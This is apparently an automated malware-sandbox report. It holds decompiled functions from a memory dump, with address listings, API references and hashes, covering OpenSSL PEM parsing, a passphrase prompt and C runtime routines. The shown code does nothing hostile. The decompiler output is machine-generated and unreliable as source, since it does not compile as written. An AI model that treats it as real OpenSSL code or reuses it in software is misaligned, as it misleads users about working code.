																								_t179 = E00BC06B0(_t268,  *((intOrPtr*)(_t256 + 4)) + _v0,  &_a44);
																								_t278 = _t281 + 0xc;
																								if(_t179 >= 0) {
																									_t181 = _v0 + _a44;
																									_v0 = _t181;
																									if(_t181 == 0) {
																										goto L63;
																									} else {
																										_t208 = _a32;
																										 *_a36 =  *((intOrPtr*)(_t277 + 4));
																										 *_a28 =  *((intOrPtr*)(_a8 + 4));
																										_push(0x338);
																										 *_a32 =  *((intOrPtr*)(_a4 + 4));
																										_t235 = _a40;
																										_push("crypto\\pem\\pem_lib.c");
																										 *_a40 = _t181;
																										E00BA3490(_t277);
																										_push(0x339);
																										_push("crypto\\pem\\pem_lib.c");
																										E00BA3490(_a8);
																										_push(0x33a);
																										_push("crypto\\pem\\pem_lib.c");
																										E00BA3490(_a4);
																										E00BC0410(_a16);
																										_t279 = _t278 + 0x28;
																										_t150 = 1;
																									}
																								} else {
																									_push(0x32d);
																									_push("crypto\\pem\\pem_lib.c");
																									_push(0x64);
																									goto L62;
																								}
																							} else {
																								_push(0x328);
																								_push("crypto\\pem\\pem_lib.c");
																								_push(0x64);
																								goto L62;
																							}
																						}
																					}
																				}
																			} else {
																				goto L40;
																			}
																		}
																	}
																	goto L64;
																	L40:
																	_push( &_a48);
																	_push(_t277);
																	_t271 = E00B95290(_t208, _t256, _t277);
																	_t281 = _t284 + 0xc;
																} while (_t271 > _t208);
															}
														}
														goto L50;
													} else {
														_push(0x2eb);
														_push("crypto\\pem\\pem_lib.c");
														_push(0x41);
														goto L62;
													}
												} else {
													do {
														while( *((char*)(_t283 + _t265 + 0x40)) <= 0x20) {
															_t265 = _t265 - 1;
															if(_t265 >= 0) {
																continue;
															}
															break;
														}
														_t274 = _t265 + 1;
														 *((char*)(_t283 + _t274 + 0x40)) = 0xa;
														_t275 = _t274 + 1;
														 *((char*)(_t283 + _t275 + 0x40)) = _t208;
														if(_a48 == 0xa) {
															goto L28;
														} else {
															_t228 = _a8;
															_t52 = _t256 + 9; // 0xa
															_t199 = E00BA98C0(_t277, _a8, _t275 + _t52);
															_t281 = _t283 + 8;
															if(_t199 == 0) {
																_push(0x2dd);
																_push("crypto\\pem\\pem_lib.c");
																_push(0x41);
																goto L62;
															} else {
																_t200 = E00C6B55B(_t228,  &_a48, "-----END ", 9);
																_t283 = _t281 + 0xc;
																if(_t200 == 0) {
																	_a24 = 1;
																	goto L28;
																} else {
																	goto L24;
																}
															}
														}
														goto L64;
														L24:
														E00C6B7A0(_t208, _t256, _t275,  *((intOrPtr*)(_a8 + 4)) + _t256,  &_a48, _t275);
														 *((char*)( *((intOrPtr*)(_a8 + 4)) + _t275 + _t256)) = _t208;
														_t256 = _t256 + _t275;
														_t265 = E00B95290(_t208, _t256, _t277, _t277,  &_a48, 0xfe);
														_t283 = _t283 + 0x18;
													} while (_t265 > _t208);
													goto L28;
												}
											} else {
												_push(0x2cc);
												_push("crypto\\pem\\pem_lib.c");
												_push(0x41);
												goto L62;
											}
										} else {
											_push(0x2c2);
											_push("crypto\\pem\\pem_lib.c");
											_push(0x41);
											L62:
											_push(0x6d);
											_push(9);
											E00B98310(_t256);
											_t278 = _t281 + 0x14;
											goto L63;
										}
									} else {
										goto L12;
									}
								}
								goto L64;
								L12:
								_t214 =  &_a48;
								_t152 = E00B95290(_t208, _t256, _t277, _t277,  &_a48, 0xfe);
								_t281 = _t282 + 0xc;
							} while (_t152 > _t208);
							goto L13;
						}
					}
					L64:
					_pop(_t257);
					_pop(_t262);
					return E00C69C26(_t150, _t208, _a304 ^ _t279, _t235, _t257, _t262);
				} else {
					E00B98310(__edi, 9, 0x6d, 0x41, "crypto\\pem\\pem_lib.c", 0x2a3);
					return E00C69C26(0, 0, _a304 ^ _t278 + 0x00000014, _t234, __edi, __esi);
				}
			}



























































                                                              0x00baaf15
                                                              0x00baaf1a
                                                              0x00baaf21
                                                              0x00baaf36
                                                              0x00baaf3d
                                                              0x00baaf4a
                                                              0x00baaf51
                                                              0x00baaf55
                                                              0x00baaf59
                                                              0x00baaf5d
                                                              0x00baaf62
                                                              0x00baaf64
                                                              0x00baaf68
                                                              0x00baaf6c
                                                              0x00baaf70
                                                              0x00baaf76
                                                              0x00baafa9
                                                              0x00baafaa
                                                              0x00baafb0
                                                              0x00baafb2
                                                              0x00baafbb
                                                              0x00baafbd
                                                              0x00baafc1
                                                              0x00baafc6
                                                              0x00baafcc
                                                              0x00bab478
                                                              0x00bab47d
                                                              0x00bab482
                                                              0x00bab487
                                                              0x00bab491
                                                              0x00bab49b
                                                              0x00bab4a0
                                                              0x00bab4a3
                                                              0x00baafe2
                                                              0x00baafe7
                                                              0x00baafed
                                                              0x00baaff4
                                                              0x00baaff9
                                                              0x00baaffe
                                                              0x00bab06f
                                                              0x00bab06f
                                                              0x00bab074
                                                              0x00bab079
                                                              0x00000000
                                                              0x00bab000
                                                              0x00bab000
                                                              0x00bab000
                                                              0x00bab007
                                                              0x00bab00a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab00a
                                                              0x00bab00e
                                                              0x00bab018
                                                              0x00bab01e
                                                              0x00bab022
                                                              0x00bab027
                                                              0x00bab02c
                                                              0x00000000
                                                              0x00bab02e
                                                              0x00bab02e
                                                              0x00bab032
                                                              0x00bab035
                                                              0x00bab035
                                                              0x00bab037
                                                              0x00bab038
                                                              0x00bab03e
                                                              0x00bab04c
                                                              0x00bab051
                                                              0x00bab056
                                                              0x00bab085
                                                              0x00bab08a
                                                              0x00bab08f
                                                              0x00bab0af
                                                              0x00bab0b7
                                                              0x00bab0bb
                                                              0x00bab0c5
                                                              0x00bab0c7
                                                              0x00bab0cc
                                                              0x00bab0d1
                                                              0x00bab0f2
                                                              0x00bab0f9
                                                              0x00bab0fb
                                                              0x00bab100
                                                              0x00bab1b1
                                                              0x00bab1b1
                                                              0x00bab1bb
                                                              0x00bab1bf
                                                              0x00bab1c4
                                                              0x00bab1c9
                                                              0x00bab1df
                                                              0x00bab1e5
                                                              0x00bab2f8
                                                              0x00bab2fc
                                                              0x00bab300
                                                              0x00bab304
                                                              0x00bab308
                                                              0x00bab1eb
                                                              0x00bab1f0
                                                              0x00bab1fb
                                                              0x00bab1fd
                                                              0x00bab202
                                                              0x00bab30c
                                                              0x00bab30c
                                                              0x00bab208
                                                              0x00bab208
                                                              0x00bab208
                                                              0x00bab20f
                                                              0x00bab212
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab212
                                                              0x00bab214
                                                              0x00bab215
                                                              0x00bab21a
                                                              0x00bab21b
                                                              0x00bab222
                                                              0x00bab224
                                                              0x00bab224
                                                              0x00bab238
                                                              0x00bab23d
                                                              0x00bab242
                                                              0x00000000
                                                              0x00bab251
                                                              0x00bab251
                                                              0x00bab255
                                                              0x00bab259
                                                              0x00bab25f
                                                              0x00bab264
                                                              0x00bab269
                                                              0x00bab2b6
                                                              0x00bab2bb
                                                              0x00bab2c0
                                                              0x00000000
                                                              0x00bab26b
                                                              0x00bab279
                                                              0x00bab285
                                                              0x00bab287
                                                              0x00bab28a
                                                              0x00bab28d
                                                              0x00bab291
                                                              0x00bab29a
                                                              0x00bab2cb
                                                              0x00bab2cc
                                                              0x00bab2cd
                                                              0x00bab2d1
                                                              0x00bab2d6
                                                              0x00bab2db
                                                              0x00bab2e0
                                                              0x00bab2e7
                                                              0x00bab2ea
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab2ea
                                                              0x00bab2ec
                                                              0x00bab2ed
                                                              0x00bab2f2
                                                              0x00bab2f2
                                                              0x00bab310
                                                              0x00bab310
                                                              0x00bab314
                                                              0x00bab317
                                                              0x00bab320
                                                              0x00bab320
                                                              0x00bab322
                                                              0x00bab323
                                                              0x00bab335
                                                              0x00bab337
                                                              0x00bab33c
                                                              0x00bab341
                                                              0x00bab460
                                                              0x00bab460
                                                              0x00bab465
                                                              0x00bab46a
                                                              0x00000000
                                                              0x00bab347
                                                              0x00bab347
                                                              0x00bab351
                                                              0x00bab356
                                                              0x00bab35b
                                                              0x00000000
                                                              0x00bab361
                                                              0x00bab36d
                                                              0x00bab372
                                                              0x00bab377
                                                              0x00000000
                                                              0x00bab37d
                                                              0x00bab37d
                                                              0x00bab382
                                                              0x00bab38b
                                                              0x00bab38e
                                                              0x00bab38f
                                                              0x00bab394
                                                              0x00bab395
                                                              0x00bab396
                                                              0x00bab397
                                                              0x00bab39c
                                                              0x00bab3a1
                                                              0x00bab3c2
                                                              0x00bab3c7
                                                              0x00bab3cc
                                                              0x00bab3e3
                                                              0x00bab3e7
                                                              0x00bab3eb
                                                              0x00000000
                                                              0x00bab3f1
                                                              0x00bab3f9
                                                              0x00bab402
                                                              0x00bab40b
                                                              0x00bab414
                                                              0x00bab419
                                                              0x00bab41b
                                                              0x00bab41f
                                                              0x00bab425
                                                              0x00bab427
                                                              0x00bab42c
                                                              0x00bab431
                                                              0x00bab437
                                                              0x00bab43c
                                                              0x00bab441
                                                              0x00bab447
                                                              0x00bab451
                                                              0x00bab456
                                                              0x00bab459
                                                              0x00bab459
                                                              0x00bab3ce
                                                              0x00bab3ce
                                                              0x00bab3d3
                                                              0x00bab3d8
                                                              0x00000000
                                                              0x00bab3d8
                                                              0x00bab3a3
                                                              0x00bab3a3
                                                              0x00bab3a8
                                                              0x00bab3ad
                                                              0x00000000
                                                              0x00bab3ad
                                                              0x00bab3a1
                                                              0x00bab377
                                                              0x00bab35b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab29a
                                                              0x00bab269
                                                              0x00000000
                                                              0x00bab29c
                                                              0x00bab2a0
                                                              0x00bab2a1
                                                              0x00bab2a7
                                                              0x00bab2a9
                                                              0x00bab2ac
                                                              0x00bab2b4
                                                              0x00bab202
                                                              0x00000000
                                                              0x00bab1cb
                                                              0x00bab1cb
                                                              0x00bab1d0
                                                              0x00bab1d5
                                                              0x00000000
                                                              0x00bab1d5
                                                              0x00bab106
                                                              0x00bab106
                                                              0x00bab106
                                                              0x00bab10d
                                                              0x00bab110
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab110
                                                              0x00bab112
                                                              0x00bab113
                                                              0x00bab118
                                                              0x00bab119
                                                              0x00bab122
                                                              0x00000000
                                                              0x00bab128
                                                              0x00bab128
                                                              0x00bab12c
                                                              0x00bab132
                                                              0x00bab137
                                                              0x00bab13c
                                                              0x00bab198
                                                              0x00bab19d
                                                              0x00bab1a2
                                                              0x00000000
                                                              0x00bab13e
                                                              0x00bab14a
                                                              0x00bab14f
                                                              0x00bab154
                                                              0x00bab1a9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab154
                                                              0x00bab13c
                                                              0x00000000
                                                              0x00bab156
                                                              0x00bab166
                                                              0x00bab17e
                                                              0x00bab182
                                                              0x00bab189
                                                              0x00bab18b
                                                              0x00bab18e
                                                              0x00000000
                                                              0x00bab196
                                                              0x00bab0d3
                                                              0x00bab0d3
                                                              0x00bab0d8
                                                              0x00bab0dd
                                                              0x00000000
                                                              0x00bab0dd
                                                              0x00bab091
                                                              0x00bab091
                                                              0x00bab096
                                                              0x00bab09b
                                                              0x00bab46c
                                                              0x00bab46c
                                                              0x00bab46e
                                                              0x00bab470
                                                              0x00bab475
                                                              0x00000000
                                                              0x00bab475
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bab056
                                                              0x00000000
                                                              0x00bab058
                                                              0x00bab05d
                                                              0x00bab063
                                                              0x00bab068
                                                              0x00bab06b
                                                              0x00000000
                                                              0x00bab000
                                                              0x00baaffe
                                                              0x00bab4a5
                                                              0x00bab4ac
                                                              0x00bab4ad
                                                              0x00bab4bd
                                                              0x00baaf78
                                                              0x00baaf88
                                                              0x00baafa8
                                                              0x00baafa8

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _strncmp
                                                              • String ID: $-----$-----BEGIN $-----END $crypto\pem\pem_lib.c
                                                              • API String ID: 909875538-1286483939
                                                              • Opcode ID: 94e1242b56e7db3af4e59b0959708b9741351bf9d944fd728c51cd01931d1d2a
                                                              • Instruction ID: 7d11f166821932857e742b0d8c3b56da6b0c43812ed9a19a1089680ba8abefef
                                                              • Opcode Fuzzy Hash: 94e1242b56e7db3af4e59b0959708b9741351bf9d944fd728c51cd01931d1d2a
                                                              • Instruction Fuzzy Hash: 7BF1F67164C301ABD720EF24C882F6FB7E8AB86704F0449ADFA9597243E775E905C792
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA78F0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108libraryloaderCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 74%
                                                              			E00BA78F0() {
				signed int _v8;
				long _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				WCHAR* _t22;
				unsigned int _t31;
				signed int _t33;
				struct HINSTANCE__* _t39;
				void* _t40;
				void* _t41;
				void* _t49;
				void* _t51;
				long _t52;
				signed int _t54;
				void* _t55;

				E00C6BB10(8);
				_t20 =  *0xcc5970; // 0x851ab4dd
				_v8 = _t20 ^ _t54;
				_t22 =  *0xcc8bcc;
				if(_t22 != 0) {
					L12:
					if(_t22 == 0xffffffff) {
						goto L6;
					} else {
						return E00C69C26( *_t22(), _t40, _v8 ^ _t54, _t49, _t51, _t52);
					}
				} else {
					_t39 = GetModuleHandleW(_t22);
					if(_t39 == 0) {
						_t22 =  *0xcc8bcc;
					} else {
						_t22 = GetProcAddress(_t39, "_OPENSSL_isservice");
						 *0xcc8bcc = _t22;
					}
					if(_t22 != 0) {
						goto L12;
					} else {
						 *0xcc8bcc = 0xffffffff;
						L6:
						_t41 = GetProcessWindowStation();
						if(_t41 == 0 || GetUserObjectInformationW(_t41, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
							L14:
							return E00C69C26(_t23 | 0xffffffff, _t41, _v8 ^ _t54, _t49, _t51, _t52);
						} else {
							_t23 = _v12;
							if(_t23 > 0x200) {
								goto L14;
							} else {
								_t52 = _t23 + 0x00000001 & 0xfffffffe;
								_v12 = _t52;
								E00C6C610(_t52 + 2);
								_t51 = _t55;
								if(GetUserObjectInformationW(_t41, 2, _t51, _t52,  &_v12) == 0) {
									goto L14;
								} else {
									_t31 = _v12 + 0x00000001 & 0xfffffffe;
									_v12 = _t31;
									 *((short*)(_t51 + (_t31 >> 1) * 2)) = 0;
									_t33 = E00C6C5AB(_t51, L"Service-0x");
									asm("sbb eax, eax");
									return E00C69C26( ~( ~_t33), _t41, _v8 ^ _t54, 0, _t51, _t52);
								}
							}
						}
					}
				}
			}





















                                                              0x00ba78f8
                                                              0x00ba78fd
                                                              0x00ba7904
                                                              0x00ba7907
                                                              0x00ba7911
                                                              0x00ba79ee
                                                              0x00ba79f1
                                                              0x00000000
                                                              0x00ba79f7
                                                              0x00ba7a0c
                                                              0x00ba7a0c
                                                              0x00ba7917
                                                              0x00ba7918
                                                              0x00ba7920
                                                              0x00ba7935
                                                              0x00ba7922
                                                              0x00ba7928
                                                              0x00ba792e
                                                              0x00ba792e
                                                              0x00ba793c
                                                              0x00000000
                                                              0x00ba7942
                                                              0x00ba7942
                                                              0x00ba794c
                                                              0x00ba7952
                                                              0x00ba7956
                                                              0x00ba7a0d
                                                              0x00ba7a23
                                                              0x00ba7984
                                                              0x00ba7984
                                                              0x00ba798c
                                                              0x00000000
                                                              0x00ba798e
                                                              0x00ba7991
                                                              0x00ba7997
                                                              0x00ba799a
                                                              0x00ba799f
                                                              0x00ba79b2
                                                              0x00000000
                                                              0x00ba79b4
                                                              0x00ba79b8
                                                              0x00ba79bb
                                                              0x00ba79c8
                                                              0x00ba79cc
                                                              0x00ba79d6
                                                              0x00ba79ed
                                                              0x00ba79ed
                                                              0x00ba79b2
                                                              0x00ba798c
                                                              0x00ba7956
                                                              0x00ba793c

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(?,?,?,?,?,00BA7B90,?,?,?,?,?,?,?,00000000,00000001), ref: 00BA7918
                                                              • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00BA7928
                                                              • GetProcessWindowStation.USER32(?,?,?,?,00BA7B90,?,?,?,?,?,?,?,00000000,00000001), ref: 00BA794C
                                                              • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,?,?,00BA7B90,?,?,?,?), ref: 00BA7967
                                                              • GetLastError.KERNEL32(?,?,?,00BA7B90,?,?,?,?,?,?,?,00000000,00000001), ref: 00BA7975
                                                              • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,?,?,00BA7B90,?,?,?,?), ref: 00BA79AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
                                                              • String ID: Service-0x$_OPENSSL_isservice
                                                              • API String ID: 1944374717-1672312481
                                                              • Opcode ID: 9c1ecb4a6644533da1edff8de915cb5edca2addde86ab6ff39c43e2f68b15dca
                                                              • Instruction ID: 19eeae08ec216ad1b2fdbd40d72b1454e79135d07975dd2db2e1195fb4185152
                                                              • Opcode Fuzzy Hash: 9c1ecb4a6644533da1edff8de915cb5edca2addde86ab6ff39c43e2f68b15dca
                                                              • Instruction Fuzzy Hash: E731A771648209BBDB10DFB9EC85BAEB7A8EF45320F600665E915D31D0EF3099058790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BAA830, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E00BAA830(void* __ebx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t12;
				signed int _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t21;
				intOrPtr* _t22;
				intOrPtr _t24;
				void* _t28;
				char* _t32;
				intOrPtr _t33;
				void* _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				intOrPtr* _t39;
				signed int _t42;
				intOrPtr _t43;
				char* _t45;
				void* _t47;
				void* _t48;

				_t28 = __ebx;
				_t38 = _a16;
				if(_t38 == 0) {
					_t45 = E00BBFFC0();
					__eflags = _t45;
					if(_t45 == 0) {
						_t45 = "Enter PEM pass phrase:";
					}
					_t39 = _a4;
					_t29 = _a12;
					asm("sbb esi, esi");
					_t42 =  ~_a12 & 0x00000004;
					_t12 = E00BBFFE0(_a12, _t34, _t45, _t39, _t42, _a8, _t45, _t29, _t28);
					_t48 = _t47 + 0x14;
					__eflags = _t12;
					if(_t12 != 0) {
						L14:
						E00B98310(_t39, 9, 0x64, 0x6d, "crypto\\pem\\pem_lib.c", 0x40);
						_t16 = E00C6BB40(_t39, _t39, 0, _a8) | 0xffffffff;
						__eflags = _t16;
					} else {
						do {
							_t17 = _t39;
							_t35 = _t17 + 1;
							do {
								_t32 =  *_t17;
								_t17 = _t17 + 1;
								__eflags = _t32;
							} while (_t32 != 0);
							_t16 = _t17 - _t35;
							__eflags = _t42;
							if(_t42 != 0) {
								__eflags = _t16 - _t42;
								if(__eflags < 0) {
									goto L13;
								}
							}
							goto L15;
							L13:
							_push(_t42);
							_push("phrase is too short, needs to be at least %d chars\n");
							_t18 = E00C6A3E6();
							E00C6D963(_t29, _t35, _t39, _t42, __eflags);
							_t21 = E00BBFFE0(_t29, _a8, _t45, _t39, _t42, _a8, _t45, _t29, _t18 + 0x40);
							_t48 = _t48 + 0x20;
							__eflags = _t21;
						} while (_t21 == 0);
						goto L14;
					}
					L15:
					return _t16;
				} else {
					_t22 = _t38;
					_t2 = _t22 + 1; // 0xbac205
					_t37 = _t2;
					do {
						_t33 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t33 != 0);
					_t43 = _t22 - _t37;
					_t24 = _a8;
					if(_t43 > _t24) {
						_t43 = _t24;
					}
					E00C6B7A0(_t28, _t38, _t43, _a4, _t38, _t43);
					return _t43;
				}
			}


























                                                              0x00baa830
                                                              0x00baa832
                                                              0x00baa838
                                                              0x00baa86f
                                                              0x00baa871
                                                              0x00baa873
                                                              0x00baa875
                                                              0x00baa875
                                                              0x00baa87e
                                                              0x00baa883
                                                              0x00baa88d
                                                              0x00baa890
                                                              0x00baa895
                                                              0x00baa89a
                                                              0x00baa89d
                                                              0x00baa89f
                                                              0x00baa8e0
                                                              0x00baa8ed
                                                              0x00baa902
                                                              0x00baa902
                                                              0x00baa8a1
                                                              0x00baa8a1
                                                              0x00baa8a1
                                                              0x00baa8a3
                                                              0x00baa8a6
                                                              0x00baa8a6
                                                              0x00baa8a8
                                                              0x00baa8a9
                                                              0x00baa8a9
                                                              0x00baa8ad
                                                              0x00baa8af
                                                              0x00baa8b1
                                                              0x00baa8b3
                                                              0x00baa8b5
                                                              0x00000000
                                                              0x00000000
                                                              0x00baa8b5
                                                              0x00000000
                                                              0x00baa8b7
                                                              0x00baa8b7
                                                              0x00baa8b8
                                                              0x00baa8bd
                                                              0x00baa8c6
                                                              0x00baa8d4
                                                              0x00baa8d9
                                                              0x00baa8dc
                                                              0x00baa8dc
                                                              0x00000000
                                                              0x00baa8a1
                                                              0x00baa905
                                                              0x00baa909
                                                              0x00baa83a
                                                              0x00baa83a
                                                              0x00baa83c
                                                              0x00baa83c
                                                              0x00baa840
                                                              0x00baa840
                                                              0x00baa842
                                                              0x00baa843
                                                              0x00baa849
                                                              0x00baa84b
                                                              0x00baa851
                                                              0x00baa853
                                                              0x00baa853
                                                              0x00baa85c
                                                              0x00baa868
                                                              0x00baa868

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _fprintf_memset
                                                              • String ID: Enter PEM pass phrase:$crypto\pem\pem_lib.c$phrase is too short, needs to be at least %d chars
                                                              • API String ID: 3021507156-1387369059
                                                              • Opcode ID: 636c4e83fc9e89bd9294e7919453c51dbe8d497e44069634b00221cb3bd4c1e7
                                                              • Instruction ID: ccb9c0cf70dc39f24d177506cd69b1965642c3611cf9ad5ecd3f76fdc4a45586
                                                              • Opcode Fuzzy Hash: 636c4e83fc9e89bd9294e7919453c51dbe8d497e44069634b00221cb3bd4c1e7
                                                              • Instruction Fuzzy Hash: C9210872A082112BD230A52D5C85F7BB7DDDF86B64F094664F958E7241E755DC02C3F2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C7365F, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 89%
                                                              			E00C7365F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xcbfda8);
				E00C70838(__ebx, __edi, __esi);
				_t31 = E00C74108(__ebx, _t35);
				_t15 =  *0xcc634c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00C6FD40(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xcc6250; // 0x2921600
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0xcc5e28;
								if(__eflags != 0) {
									_push(_t33);
									E00C69CB2(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0xcc6250; // 0x2921600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xcc6250; // 0x2921600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00C736FA();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00C6B253(_t29, 0x20);
				}
				return E00C7087D(_t33);
			}











                                                              0x00c7365f
                                                              0x00c7365f
                                                              0x00c7365f
                                                              0x00c7365f
                                                              0x00c73661
                                                              0x00c73666
                                                              0x00c73670
                                                              0x00c73672
                                                              0x00c7367a
                                                              0x00c7369b
                                                              0x00c736a1
                                                              0x00c736a5
                                                              0x00c736a8
                                                              0x00c736ab
                                                              0x00c736b1
                                                              0x00c736b3
                                                              0x00c736b5
                                                              0x00c736b8
                                                              0x00c736be
                                                              0x00c736c0
                                                              0x00c736c2
                                                              0x00c736c8
                                                              0x00c736ca
                                                              0x00c736cb
                                                              0x00c736d0
                                                              0x00c736c8
                                                              0x00c736c0
                                                              0x00c736d1
                                                              0x00c736d6
                                                              0x00c736d9
                                                              0x00c736df
                                                              0x00c736e3
                                                              0x00c736e3
                                                              0x00c736e9
                                                              0x00c736f0
                                                              0x00c73682
                                                              0x00c73682
                                                              0x00c73682
                                                              0x00c73687
                                                              0x00c7368b
                                                              0x00c73690
                                                              0x00c73698

                                                              APIs
                                                              • __getptd.LIBCMT ref: 00C7366B
                                                                • Part of subcall function 00C74108: __getptd_noexit.LIBCMT ref: 00C7410B
                                                                • Part of subcall function 00C74108: __amsg_exit.LIBCMT ref: 00C74118
                                                              • __amsg_exit.LIBCMT ref: 00C7368B
                                                              • __lock.LIBCMT ref: 00C7369B
                                                              • InterlockedDecrement.KERNEL32(?), ref: 00C736B8
                                                              • InterlockedIncrement.KERNEL32(02921600), ref: 00C736E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
